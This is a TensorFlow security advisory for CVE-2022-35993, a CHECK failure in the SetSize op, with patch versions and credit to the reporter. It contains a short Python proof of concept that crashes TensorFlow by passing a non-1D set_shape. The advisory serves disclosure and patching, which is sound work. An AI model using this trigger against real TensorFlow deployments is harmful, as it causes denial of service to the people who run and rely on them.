## TFSA-2022-127: `CHECK` fail in `SetSize`

### CVE Number
CVE-2022-35993

### Impact
When `SetSize` receives an input `set_shape` that is not a 1D tensor, it gives a `CHECK` fails that can be used to trigger a denial of service attack.
```python
import tensorflow as tf
arg_0=1
arg_1=[1,1]
arg_2=1
arg_3=True
arg_4=''
tf.raw_ops.SetSize(set_indices=arg_0, set_values=arg_1, set_shape=arg_2,
                   validate_indices=arg_3, name=arg_4)
```

### Patches
We have patched the issue in GitHub commit [cf70b79d2662c0d3c6af74583641e345fc939467](https://github.com/tensorflow/tensorflow/commit/cf70b79d2662c0d3c6af74583641e345fc939467).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
